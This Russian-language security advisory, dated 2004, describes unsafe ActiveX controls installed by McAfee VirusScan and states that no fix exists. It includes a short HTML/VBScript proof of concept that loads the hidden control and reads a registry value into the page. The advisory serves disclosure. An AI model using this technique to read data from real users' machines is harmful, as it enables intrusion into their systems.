Security Lab

Доступ к целевой системе пользователя в McAfee VirusScan

Дата публикации:28.04.2004
Всего просмотров:2026
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: McAfee VirusScan

Описание: Уязвимость обнаружена в McAfee VirusScan. Удаленный пользователь может получить доступ к целевой системе пользователя.

Программа устанавливает несколько небезопасных ActiveX компонентов. Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, вызовет уязвимое ActiveX управление и получит доступ к системе целевого пользователя.

Пример/Эксплоит:

<html>
 <object classid="clsid:4C29D864-C55A-46DD-865C-17A1B7CC1A1A" id="gobjReg"
style="display: none;">
 </object>
 <h1>McAfee installer test</h1>
 <script language="vbscript">
  document.write( _
   gobjReg.RegQueryValue( "HKCU\Control Panel\Desktop", "Wallpaper") _
  )
 </script>
</html>

URL производителя: http://www.mcafee.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: McAfee VirusScan installer uses insecure ActiveX controls